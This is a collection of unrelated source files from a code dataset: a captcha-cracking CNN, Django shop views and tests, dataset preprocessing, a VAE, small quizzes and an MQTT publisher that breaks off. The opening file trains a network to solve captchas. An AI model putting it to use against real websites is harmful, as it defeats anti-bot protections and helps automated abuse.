tf.placeholder(tf.float32) # dropout\n\n\n# Define the CNN\ndef crack_captcha_cnn(w_alpha=0.01, b_alpha=0.1):\n # Reshape the flat placeholder back to image layout\n x = tf.reshape(X, shape=[-1, constant.IMAGE_HEIGHT, constant.IMAGE_WIDTH, 1])\n\n # 3 conv layers\n w_c1 = tf.Variable(w_alpha * tf.random_normal([3, 3, 1, 32])) # random values drawn from a normal distribution\n b_c1 = tf.Variable(b_alpha * tf.random_normal([32]))\n # 32 3x3 filters\n conv1 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides=[1, 1, 1, 1], padding='SAME'), b_c1)) # (-1, 54, 31, 32)\n # non-overlapping 2x2 max pooling\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 27, 16, 32)\n variable_summaries(conv1, \"conv1\")\n conv1 = tf.nn.dropout(conv1, keep_prob)\n\n w_c2 = tf.Variable(w_alpha * tf.random_normal([3, 3, 32, 64]))\n b_c2 = tf.Variable(b_alpha * tf.random_normal([64]))\n # 64 3x3 filters\n conv2 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides=[1, 1, 1, 1], padding='SAME'), b_c2)) # (-1, 27, 16, 64)\n variable_summaries(conv2, \"conv2\")\n # non-overlapping 2x2 max pooling\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 14, 7, 64)\n conv2 = tf.nn.dropout(conv2, keep_prob)\n\n w_c3 = tf.Variable(w_alpha * tf.random_normal([3, 3, 64, 64]))\n b_c3 = tf.Variable(b_alpha * tf.random_normal([64]))\n # 64 3x3 filters\n conv3 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides=[1, 1, 1, 1], padding='SAME'), b_c3)) # (-1, 14, 7, 64)\n variable_summaries(conv3, \"conv3\")\n # non-overlapping 2x2 max pooling\n conv3 = tf.nn.max_pool(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 7, 4, 64)\n conv3 = tf.nn.dropout(conv3, keep_prob)\n\n # Fully connected layer\n # dense layer with 20 units\n w_d = tf.Variable(w_alpha * tf.random_normal([7 * 4 * 64, 20]))\n b_d = tf.Variable(b_alpha * tf.random_normal([20]))\n dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])\n dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))\n dense = tf.nn.dropout(dense, keep_prob)\n\n # logits layer\n w_out = tf.Variable(w_alpha * tf.random_normal([20, constant.MAX_CAPTCHA * CHAR_SET_LEN]))\n b_out = tf.Variable(b_alpha * tf.random_normal([constant.MAX_CAPTCHA * CHAR_SET_LEN]))\n logits = tf.add(tf.matmul(dense, w_out), b_out)\n variable_summaries(logits, \"logits\")\n # out = tf.nn.softmax(out)\n return logits\n\n\n# Training\ndef train_crack_captcha_cnn():\n logits = crack_captcha_cnn()\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y))\n # loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=Y))\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n\n predict_position = tf.argmax(tf.reshape(logits, [-1, constant.MAX_CAPTCHA, CHAR_SET_LEN]), 2)\n # variable_summaries(predict_position, \"pre\")\n actual_position = tf.argmax(tf.reshape(Y, [-1, constant.MAX_CAPTCHA, CHAR_SET_LEN]), 2)\n correct_pred = tf.equal(predict_position, actual_position)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n saver = tf.train.Saver()\n merged = tf.summary.merge_all()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n # resume from the previous checkpoint\n # model_file = tf.train.latest_checkpoint(model_dir)\n # saver.restore(sess, model_file)\n\n train_writer = tf.summary.FileWriter(\"/tmp/board/captcha\" + '/train', sess.graph)\n\n step = 0\n while True:\n batch_x, batch_y = get_next_batch(64)\n _, loss_, summary = sess.run([optimizer, loss, merged], feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.75})\n print(step, loss_)\n\n # evaluate accuracy every 100 steps\n if step % 100 == 0:\n batch_x_test, batch_y_test = get_next_batch_overfit(100)\n acc = sess.run(accuracy, feed_dict={X: batch_x_test, Y: batch_y_test, keep_prob: 1.})\n print(step, acc)\n if step % 200 == 0:\n save_path = saver.save(sess, model_dir + \"model.ckpt\", global_step=step)\n print(\"Model saved in path: %s\" % save_path)\n\n train_writer.add_summary(summary, step)\n step += 1\n\n\ndef variable_summaries(var, name):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope(name):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n # with tf.name_scope('stddev'):\n # stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n # tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n 
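# The scalar summaries above log one value per training step; the histogram below\n # records the full distribution of 'var', which TensorBoard renders on its\n # histograms and distributions tabs.\n 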
tf.summary.histogram('histogram', var)\n\n\nif __name__ == '__main__':\n train_crack_captcha_cnn()\n","sub_path":"overfit.py","file_name":"overfit.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446629819","text":"import os\nimport json\nfrom django.test import TestCase\nfrom casexml.apps.case.tests import delete_all_cases\nfrom corehq.apps.commtrack.models import Product, RequisitionCase\nfrom custom.openlmis.api import Program\nfrom custom.openlmis.commtrack import bootstrap_domain, sync_openlmis_program, sync_openlmis_product, sync_requisition_from_openlmis\nfrom custom.openlmis.tests import MockOpenLMISEndpoint\n\nTEST_DOMAIN = 'openlmis-commtrack-program-test'\n\nclass RequisitionSyncTest(TestCase):\n\n def setUp(self):\n self.datapath = os.path.join(os.path.dirname(__file__), 'data')\n self.api = MockOpenLMISEndpoint(\"uri://mock/lmis/endpoint\", username='ned', password='honor')\n bootstrap_domain(TEST_DOMAIN)\n delete_all_cases()\n for product in Product.by_domain(TEST_DOMAIN):\n product.delete()\n\n def testSyncRequisition(self):\n with open(os.path.join(self.datapath, 'sample_program.json')) as f:\n lmis_program = Program.from_json(json.loads(f.read()))\n commtrack_program = sync_openlmis_program(TEST_DOMAIN, lmis_program)\n test_product = {\n 'name': 'Test',\n 'code': 'P151',\n 'unit': 10,\n 'description': 'decs',\n 'category': 'category',\n }\n sync_openlmis_product(TEST_DOMAIN, commtrack_program, test_product)\n sync_requisition_from_openlmis(TEST_DOMAIN, 1, self.api)\n self.assertTrue(1, len(RequisitionCase.get_by_external(TEST_DOMAIN, 1)))","sub_path":"custom/openlmis/tests/test_requisition_sync.py","file_name":"test_requisition_sync.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462810835","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'data', metavar='data.json',\n help='Data to convert to dataset'\n )\n parser.add_argument(\n 'answers', metavar='answers.json',\n help='Answers to store gold standard in the dataset'\n )\n parser.add_argument(\n '-o', '--output', default=None,\n help='Output file to write dataset (default stdout)'\n )\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\n\"\"\"\n gold_answers\n \"f001_0\": \"3\", ...\n race format:\n \"C\"\n\"\"\"\n\n\ndef merge_data_with_labels(data, gold_answers, strict_nof_options=4):\n dataset = []\n nof_questions = 0\n skipped_questions = 0\n gold_keys = list(gold_answers.keys())\n for id, item in data.items():\n questions, options, answers, article = [], [], [], None\n for q_id, question_data in item['questions'].items():\n nof_questions += 1\n answer_opts = list(question_data['answers'].values())\n if q_id not in gold_keys:\n print('Skipping: ', q_id, 'gold_keys')\n skipped_questions += 1\n continue\n elif strict_nof_options > 0:\n if len(answer_opts) != strict_nof_options:\n print(\n 'Skipping: ', q_id,\n 'strict_nof_options', len(answer_opts)\n )\n skipped_questions += 1\n continue\n\n questions.append(question_data['question'])\n options.append(answer_opts)\n answers.append(chr(ord('A') + int(gold_answers[q_id])))\n\n article = item['context']\n assert(len(questions) == len(options) == len(answers))\n example = dict(\n id=id, questions=questions,\n 
options=options, answers=answers, article=article\n )\n dataset.append(example)\n\n return dataset, skipped_questions, nof_questions\n\n\ndef prepare_gold_answers(answers):\n # dev split has ids accessed through topics: Eg: Belief_states,\n # Entity_properties... see the paper:\n # https://aaai.org/Papers/AAAI/2020GB/AAAI-RogersA.7778.pdf\n gold_answers = {}\n first_key = list(answers.keys())[0]\n if type(answers[first_key]) == dict:\n # dev collection\n for golds in answers.values():\n gold_answers.update(golds)\n else:\n gold_answers = answers\n return gold_answers\n\n\ndef main(args):\n questions = json.load(open(args.data, 'r'))\n answers = json.load(open(args.answers, 'r'))\n gold_answers = prepare_gold_answers(answers['data'])\n dataset, skipped, total = merge_data_with_labels(\n questions['data'],\n gold_answers\n )\n data = dict(version=questions['version'], data=dataset)\n data_print = json.dumps(obj=data, ensure_ascii=False) + '\\n'\n if args.output is None:\n print(data)\n else:\n print('Skipped {}/{} documents.'.format(skipped, total))\n with open(args.output, 'w') as fstream:\n fstream.write(data_print)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","sub_path":"src/etl/preprocess_quail_to_race.py","file_name":"preprocess_quail_to_race.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"544810721","text":"''' On certain occasions we have to write numbers out in words, \nfor example when filling in a cheque. \nSome numbers can raise a few doubts.\n\nThe uncertainty arises above all when writing numbers composed with 1 and 8. \nAll numbers such as venti, trenta, quaranta, cinquanta, etc. elide their final \nvowel (the \"i\" for 20, the \"a\" for all the others), merging it with the initial vowel \nof the following number; so we write ventuno, ventotto, trentotto, \ncinquantuno, etc.\n\nThe number cento, when forming numbers composed with one and eight, does not behave \nthis way; \"cento\" and all the hundreds (duecento, trecento, etc.), \nin fact, do not elide their final vowel. So we do not write centuno or trecentotto but centouno, \ntrecentootto, etc.\n\nNumbers composed of the hundreds plus the ten \"ottanta\", however, do elide \nthe final vowel again; so we write centottanta, duecentottanta, etc., \nnot centoottanta, duecentoottanta, ...\n\nThe number \"mille\" never elides its final vowel in any compound number; so we write \nmilleuno, milleotto, milleottanta, etc.\n\nFurther examples are listed in the file grade02.txt\n\n\nWrite a function conv(n) that takes as input an integer n, with 0[0-9A-z-_.]+)/?\", comment, re.I)\n if urls_in_comment and any(map(lambda x: x != 'past-indicator.com', urls_in_comment)):\n return self.form_invalid(form)\n\n messages.success(self.request, _(u'''We have accepted your callback request'''))\n \n self.request.session['callback'] = True\n self.request.session.save()\n response = super(CallBackView, self).form_valid(form)\n send_new_offer_mail(self.object)\n return response\n\n\ndef cart_view(request):\n template_name = 'shop/cart.html'\n cart = Cart(request)\n cart.check()\n cart_data = cart.with_products\n products_formset = formset_factory(forms.AddToCartForm, extra=0, can_delete=True)\n formset = products_formset(initial=cart_data)\n if request.method.lower() == 'post':\n if 'send' not in request.POST:\n formset = products_formset(request.POST, initial=cart_data)\n if formset.is_valid():\n if any(['DELETE' in name for name in request.POST.keys()]):\n [cart.del_item(form.cleaned_data['product'].id) for form in formset.deleted_forms]\n formset = products_formset(initial=cart.with_products)\n elif request.POST.get('calculate'):\n cart.with_messages = False\n [cart.__setitem__(form.cleaned_data['product'].id, form.cleaned_data['count'])\n for form in formset]\n cart.save()\n\n 
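# The formset handling above may have emptied the cart (all rows deleted), so\n # bail out to the main catalogue before building the checkout context below.\n 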
if not cart.count:\n messages.error(request, _(u'Your cart is empty. Choose a clock and add it to your cart'))\n return redirect('shop:main')\n from .checkout import checkout_api # todo: remove\n context = {\n 'checkout_ticket': checkout_api.ticket if not settings.DEBUG else 'test', # todo: remove\n 'formset': formset,\n }\n return render(request, template_name, context)\n\n\nclass ClientView(FormView):\n template_name = 'shop/checkout.html'\n form_class = forms.CheckOutForm\n success_url = 'delivery'\n\n def form_valid(self, form):\n if form.cleaned_data['country'] != forms.CheckOutForm.RUS:\n self.success_url = 'payment'\n return super(ClientView, self).form_valid(form)\n\n\nclass DeliveryView(FormView):\n template_name = 'shop/delivery.html'\n form_class = forms.OrderDeliverySelectForm\n success_url = 'cart'\n\n @cached_property\n def address_form(self):\n return forms.AddressForm(self.request.POST if self.request.POST else None)","sub_path":"core/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"627410447","text":"import os\r\nimport re\r\nimport random\r\n\r\n\r\ndef finder():\r\n dict = {}\r\n counter = 0\r\n score = 0\r\n path = \"C:\\\\Users\\\\Vanek\\\\Desktop\\\\Vocalubary\\\\Dictionary\"\r\n attempts = int(input(\"How many repetitions: \"))\r\n while attempts < 0 or attempts > 500:\r\n attempts = int(input(\"How many repetitions: \"))\r\n letterNumber = int(input(\"Letter number: \"))\r\n while letterNumber < 0 or letterNumber > 25:\r\n letterNumber = int(input(\"Letter number: \"))\r\n for file in os.listdir(path):\r\n if counter != letterNumber:\r\n counter += 1\r\n continue\r\n filename = os.fsdecode(file)\r\n print(f'File: {filename}')\r\n with open(path + \"\\\\\" + filename, encoding='utf-8') as f:\r\n content = f.readlines()\r\n if (len(content) < 2):\r\n break\r\n for line in content:\r\n english_word = line.split('-')[0]\r\n translate_word = str(''.join(line.split('-')[2:]))\r\n if len(translate_word) == 0:\r\n translate_word = str(''.join(line.split('-')[1:]))\r\n english_word = str(re.sub(r'[^a-zA-Z]', '', english_word))\r\n vocalubary_string = [(english_word, translate_word)]\r\n dict.update(vocalubary_string)\r\n break\r\n words = list(dict.keys())\r\n translations = list(dict.values())\r\n for i in range(0, attempts):\r\n # randint is inclusive on both ends, so the upper bound must be len(words) - 1\r\n randomNumber = random.randint(0, len(words) - 1)\r\n print(f'Word: {translations[randomNumber]}')\r\n answer = input(\"Enter the correct translation: \")\r\n os.system('CLS')\r\n if answer.lower().replace(' ', '') == words[randomNumber].lower().replace(' ', ''):\r\n score += 1\r\n print(f'\\nCorrect, {words[randomNumber].lower()}\\n')\r\n else:\r\n print(f'\\nIncorrect, it should be {words[randomNumber].lower()}\\n')\r\n os.system('CLS')\r\n print(f\"\\nYour score: {score} out of {attempts}\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n finder()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"178069225","text":"from torch import nn\nfrom torch.autograd import Variable\n\nclass VAE(nn.Module) :\n\n def __init__(self, input_dim, zdims, h_num):\n super(VAE, self).__init__()\n \n self.input_dim = input_dim\n self.h_num = h_num\n self.zdims = zdims\n self.leakyrelu = nn.LeakyReLU()\n self.sigmoid = nn.Sigmoid()\n \n \n # h_num = 1\n if self.h_num == 1 :\n # Encoder\n self.h1dim = round((self.input_dim+self.zdims) * (1/2))\n self.fc1 = nn.Linear(input_dim, 
self.h1dim)\n self.fc21 = nn.Linear(self.h1dim, self.zdims) # mu\n self.fc22 = nn.Linear(self.h1dim, self.zdims) # log_var \n # Decoder\n self.fc3 = nn.Linear(self.zdims, self.h1dim)\n self.fc4 = nn.Linear(self.h1dim, self.input_dim) # from latent space to output\n \n # h_num = 2 :\n if self.h_num == 2 :\n # Encoder\n self.h1dim = round((self.input_dim+self.zdims) * (2/3))\n self.h2dim = round((self.input_dim+self.zdims) * (1/3))\n self.fc1 = nn.Linear(input_dim, self.h1dim)\n self.fc2 = nn.Linear(self.h1dim, self.h2dim)\n self.fc31 = nn.Linear(self.h2dim, self.zdims)\n self.fc32 = nn.Linear(self.h2dim, self.zdims)\n # Decoder\n self.fc4 = nn.Linear(self.zdims, self.h2dim)\n self.fc5 = nn.Linear(self.h2dim, self.h1dim)\n self.fc6 = nn.Linear(self.h1dim, self.input_dim)\n \n \n def encode(self, x) :\n if self.h_num == 1 :\n h1 = self.leakyrelu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1) # returns mu, log_var\n if self.h_num == 2 :\n h1 = self.leakyrelu(self.fc1(x))\n h2 = self.leakyrelu(self.fc2(h1))\n return self.fc31(h2), self.fc32(h2)\n \n def reparametrize(self, mu, logvar) : \n if self.training :\n std = logvar.mul(0.5).exp_() # std = exp(logvar / 2)\n eps = Variable(std.data.new(std.size()).normal_())\n # for training, which enables backpropagation through the sampling step\n return eps.mul(std).add_(mu)\n \n else :\n # for inference, deterministically return the posterior mean mu\n return mu\n \n def decode(self, z) :\n if self.h_num == 1 :\n h3 = self.leakyrelu(self.fc3(z))\n return self.sigmoid(self.fc4(h3)) # final output, reconstruction of mnist image\n if self.h_num == 2 :\n h4 = self.leakyrelu(self.fc4(z))\n h5 = self.leakyrelu(self.fc5(h4))\n return self.sigmoid(self.fc6(h5))\n \n def forward(self, x) :\n mu, logvar = self.encode(x.view(-1, self.input_dim))\n z = self.reparametrize(mu, logvar)\n return self.decode(z), mu, logvar\n ","sub_path":"KU-BIG(빅데이터 학회)/Outlier Detction(AVE)/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"295464230","text":"import csv\n\ndata = csv.reader(open(r'e:\\Data_VB\\wrds_directorship_2008.csv','r'))\nheader = data.next()\nheader.append('YEAR')\nlines = ','.join(header)+'\\n'\nfor row in data:\n\trow.append('2008')\n\trow = '\"' + '\",\"'.join(row)+'\"\\n'\n\tlines = lines + row\nopen(r'e:\\Data_VB\\wrds_directorship_2008_updated.csv','w').writelines(lines)\n","sub_path":"AddAttributeYear.py","file_name":"AddAttributeYear.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"511261259","text":"import pytest\n\nfrom tox_ansible.ansible.scenario import Scenario\nfrom tox_ansible.options import Options\nfrom tox_ansible.tox_helper import Tox\nfrom tox_ansible.tox_molecule_case import ToxMoleculeCase\n\nDOCKER_DRIVER = {\"driver\": {\"name\": \"docker\"}}\nOPENSTACK_DRIVER = {\"driver\": {\"name\": \"openstack\"}}\nBASE_DEPS = [\n \"ansible-lint\",\n \"flake8\",\n \"pytest\",\n \"testinfra\",\n \"yamllint\",\n \"boto\",\n \"boto3\",\n \"molecule\",\n \"molecule-containers\",\n \"molecule-docker\",\n \"molecule-ec2\",\n \"molecule-openstack\",\n \"molecule-podman\",\n \"molecule-vagrant\",\n \"openstacksdk\",\n \"os-client-config\",\n]\n\n\n@pytest.fixture\ndef config(mocker):\n return mocker.PropertyMock(return_value={})\n\n\n@pytest.fixture\ndef scenario():\n return Scenario(\"molecule/my_test\")\n\n\n@pytest.fixture\ndef opts(mocker):\n config = mocker.Mock()\n reader = mocker.Mock()\n 
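# Presumably mirroring tox's config API: Options() only consumes\n # get_reader().getlist(), stubbed here to return the Ansible versions under test.\n 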
config.get_reader.return_value = reader\n reader.getlist.return_value = [\"2.10\", \"3.9\"]\n return Options(config)\n\n\ndef test_case_is_simple(config, opts, scenario, mocker):\n mocker.patch.object(Options, \"get_global_opts\", return_value=[])\n mocker.patch.object(\n Tox, \"posargs\", new_callable=mocker.PropertyMock, return_value=[]\n )\n t = ToxMoleculeCase(scenario)\n assert t.get_name() == \"my_test\"\n assert t.get_working_dir() == \"\"\n assert sorted(t.get_dependencies()) == sorted(BASE_DEPS + [\"ansible\"])\n cmds = [[\"molecule\", \"test\", \"-s\", scenario.name]]\n assert t.get_commands(opts) == cmds\n assert t.get_basepython() is None\n\n\ndef test_case_has_global_opts(mocker, scenario, opts, config):\n mocker.patch.object(Options, \"get_global_opts\", return_value=[\"-c\", \"derp\"])\n mocker.patch.object(\n Tox, \"posargs\", new_callable=mocker.PropertyMock, return_value=[]\n )\n t = ToxMoleculeCase(scenario)\n cmds = [[\"molecule\", \"-c\", \"derp\", \"test\", \"-s\", scenario.name]]\n assert t.get_commands(opts) == cmds\n\n\ndef test_case_expand_ansible(scenario):\n # pylint: disable=misplaced-comparison-constant\n t = ToxMoleculeCase(scenario)\n ts = t.expand_ansible(\"2.7\")\n assert ts.ansible == \"2.7\"\n assert ts.get_name() == \"ansible27-my_test\"\n assert sorted(ts.get_dependencies()) == sorted(BASE_DEPS + [\"ansible==2.7.*\"])\n assert ts.get_basepython() is None\n assert \"Auto-generated for: molecule test -s my_test\" == ts.description\n\n\ndef test_case_expand_python(scenario):\n t = ToxMoleculeCase(scenario)\n ts = t.expand_python(\"4.1\")\n assert ts.python == \"4.1\"\n assert ts.get_name() == \"py41-my_test\"\n assert ts.get_basepython() == \"python4.1\"\n\n\ndef test_case_expand_twice(scenario):\n t = ToxMoleculeCase(scenario)\n t1 = t.expand_python(\"4.1\")\n t2 = t1.expand_ansible(\"1.0\")\n assert t2.get_name() == \"ansible10-py41-my_test\"\n\n\ndef test_case_includes_docker_deps(mocker):\n mocker.patch.object(\n Scenario, \"driver\", new_callable=mocker.PropertyMock, return_value=\"docker\"\n )\n s = Scenario(\"molecule/my_test\")\n t = ToxMoleculeCase(s)\n assert \"molecule-docker\" in t.get_dependencies()\n\n\ndef test_case_includes_openstack_deps(mocker):\n mocker.patch.object(\n Scenario, \"driver\", new_callable=mocker.PropertyMock, return_value=\"openstack\"\n )\n s = Scenario(\"molecule/osp_test\")\n t = ToxMoleculeCase(s)\n assert \"openstacksdk\" in t.get_dependencies()\n","sub_path":"tests/test_tox_molecule_case.py","file_name":"test_tox_molecule_case.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546994705","text":"import tensorflow as tf\nfrom set_operations import cartesian_product, nn_inner_prod\n\nclass SetNN(object):\n def __init__(\n self, \n input, \n layer_sizes=[(17, 7), (13, 7), (9, 7)], \n out_size=4, \n num_layers=3\n ):\n self.input = input\n self.layer_sizes = layer_sizes\n self.out_size = out_size\n self.num_layers = num_layers\n\n def build_tensorflow_model(self):\n in_size = 3\n output = self.input\n for layer in range(self.num_layers):\n with tf.variable_scope(\n \"single_set{}\".format(layer), reuse=tf.AUTO_REUSE\n ) as scope:\n output = self._layer(\n output, self.layer_sizes[layer], self.out_size, in_size\n )\n in_size = self.out_size\n \n return tf.reduce_mean(output, axis=[1], name=\"final_output\")\n\n def _layer(self, input, param_set, units, in_size):\n raise Exception(\"_layer method must be 
implemented\")\n\nclass Single_SetNN(SetNN):\n def _layer(self, input, param_set, units, in_size=4):\n m, n = param_set\n weight = tf.get_variable(\"weight\", [m, n], dtype=tf.float32)\n in_dim, out_dim = (tf.shape(input)[1], m)\n \n input,weight = cartesian_product(input, weight)\n\n product = tf.concat([input, weight], 2)\n nn_prod = nn_inner_prod(product, units, in_size+n)\n nn_prod = tf.reshape(\n nn_prod, [tf.shape(nn_prod)[0], in_dim, out_dim, tf.shape(nn_prod)[2]]\n )\n\n return tf.reduce_max(nn_prod, axis=[1], name=\"reduce\")\n\ndef set_set_network(input):\n with tf.variable_scope('set_set1'):\n output1 = layer(input, 12, 5, 3)\n with tf.variable_scope('set_set2'):\n output2 = layer(output1, 40, 20, 3)\n with tf.variable_scope('set_set3'):\n output3 = layer(output2, 50, 100, 3)\n with tf.variable_scope('set_set4'):\n final_output = fc_layer(output3, 35, 20, 3)\n\n return final_output\n\ndef layer(input, f, m, n):\n filters = []\n\n for i in range(f):\n key = \"_\" + str(i)\n weight = tf.get_variable(\"weight\"+key, [m, n], dtype=tf.float32, initializer=tf.initializers.random_normal)\n\n input,weight = cartesian_product(input, weight)\n\n product = tf.cross(input, weight, name=\"cross\"+key)\n inner_prod = tf.reduce_mean(product, axis=[1], name=\"reduce\"+key)\n\n filters.append(inner_prod)\n\n return tf.nn.relu(tf.transpose(tf.stack(filters), perm=[1, 0, 2])) \n\ndef fc_layer(input, f, m, n):\n result = layer(input, f, m, n)\n\n return tf.nn.relu(tf.reduce_mean(result, axis=[2]), name=\"fc_layer\")\n\nif __name__ == '__main__':\n with tf.Session() as s:\n input = tf.get_variable(\"input\", [5, 100, 3], dtype=tf.float32)\n print(Single_SetNN(input).build_tensorflow_model())\n for op in tf.get_default_graph().get_operations():\n print(str(op.name))\n","sub_path":"setlearn/experiments/NN_Set.py","file_name":"NN_Set.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33644172","text":"\"\"\"\n:Copyright: 2006-2019 Jochen Kupperschmidt\n:License: Modified BSD, see LICENSE for details.\n\"\"\"\n\nfrom byceps.typing import UserID\n\nfrom byceps.services.user import command_service as user_command_service\nfrom byceps.services.user import event_service\nfrom byceps.services.user import service as user_service\n\nfrom tests.base import AbstractAppTestCase\nfrom tests.helpers import create_user\n\n\nADMIN_ID = UserID('5a4e04b4-7258-4e61-9f36-090baa683150')\n\n\nclass UserSuspendedFlagTest(AbstractAppTestCase):\n\n def setUp(self):\n super().setUp()\n\n self.user = create_user()\n\n def test_suspend(self):\n reason = 'User has been caught cheating.'\n\n user_before = user_service.find_user(self.user.id)\n assert not user_before.suspended\n\n events_before = event_service.get_events_for_user(user_before.id)\n assert len(events_before) == 0\n\n # -------------------------------- #\n\n user_command_service.suspend_account(self.user.id, ADMIN_ID, reason)\n\n # -------------------------------- #\n\n user_after = user_service.find_user(self.user.id)\n assert user_after.suspended\n\n events_after = event_service.get_events_for_user(user_after.id)\n assert len(events_after) == 1\n\n suspended_event = events_after[0]\n assert suspended_event.event_type == 'user-suspended'\n assert suspended_event.data == {\n 'initiator_id': str(ADMIN_ID),\n 'reason': reason,\n }\n\n def test_unsuspend(self):\n user_command_service.suspend_account(self.user.id, ADMIN_ID, 'Annoying')\n\n reason = 'User showed penitence. 
Drop the ban.'\n\n user_before = user_service.find_user(self.user.id)\n assert user_before.suspended\n\n events_before = event_service.get_events_for_user(user_before.id)\n assert len(events_before) == 1\n\n # -------------------------------- #\n\n user_command_service.unsuspend_account(self.user.id, ADMIN_ID, reason)\n\n # -------------------------------- #\n\n user_after = user_service.find_user(self.user.id)\n assert not user_after.suspended\n\n events_after = event_service.get_events_for_user(user_after.id)\n assert len(events_after) == 2\n\n unsuspended_event = events_after[1]\n assert unsuspended_event.event_type == 'user-unsuspended'\n assert unsuspended_event.data == {\n 'initiator_id': str(ADMIN_ID),\n 'reason': reason,\n }\n","sub_path":"tests/services/user/test_suspend_unsuspend.py","file_name":"test_suspend_unsuspend.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465253971","text":"import pywt\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nts = [2, 56, 3, 22, 3, 4, 56, 7, 8, 9, 44, 23, 1, 4, 6, 2]\n\n(ca, cd) = pywt.dwt(ts,'haar')\n\ncat = pywt.thresholding.soft(ca, np.std(ca)/2)\ncdt = pywt.thresholding.soft(cd, np.std(cd)/2)\n\nts_rec = pywt.idwt(cat, cdt, 'haar')\n\nplt.close('all')\n\nplt.subplot(211)\n# Original coefficients\nplt.plot(ca, '--*b')\nplt.plot(cd, '--*r')\n# Thresholded coefficients\nplt.plot(cat, '--*c')\nplt.plot(cdt, '--*m')\nplt.legend(['ca','cd','ca_thresh', 'cd_thresh'], loc=0)\nplt.grid('on')\n\nplt.subplot(212)\nplt.plot(ts)\nplt.hold('on')\nplt.plot(ts_rec, 'r')\nplt.legend(['original signal', 'reconstructed signal'])\nplt.grid('on')\nplt.show()","sub_path":"pds_codes_imgs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243447797","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nimport os\nimport requests\nimport json\n\ndef depth(symbol, limit=10):\n try:\n key = os.getenv('APIKEY')\n #secret = os.getenv('APISECRET')\n base_url = \"https://api.binance.com\"\n with requests.Session() as s:\n s.headers = {\n 'X-MBX-APIKEY': key\n }\n return json.loads(s.get(base_url + (\"/api/v1/depth?symbol=%s&limit=%d\" % (symbol, limit))).text)\n except:\n return {}\n","sub_path":"workers/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"544959683","text":"import paho.mqtt.client as paho\nimport argparse\nimport time\nimport sys\nimport datetime\nimport time\nimport json\n\n\"\"\"\nThe publisher will publish a message which will be received from a subscriber.\nThis publisher publishes the user names for which the retail prices must be calculated.\n\"\"\"\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n #160.40.49.197 Current hostname\n '--h', type = str,\n required=True\n )\n\nparser.add_argument(\n\n '--list', type = str,\n nargs='+',\n help=' Set flag',\n required=True)\n\nargs = parser.parse_args()\nbroker = args.h #host name , Replace with your IP address.\ntopic = \"info\"\n#port=1883 #MQTT data listening port\n#ACCESS_TOKEN='M7OFDCmemyKoi461BJ4j' #not always necessary\n\ndef on_publish(client,userdata,result):\n '''The function for callback (paho MQTT client).'''\n print(\"Published data is : \")\n pass\n\nclient1 = paho.Client(\"control2\") #create client 
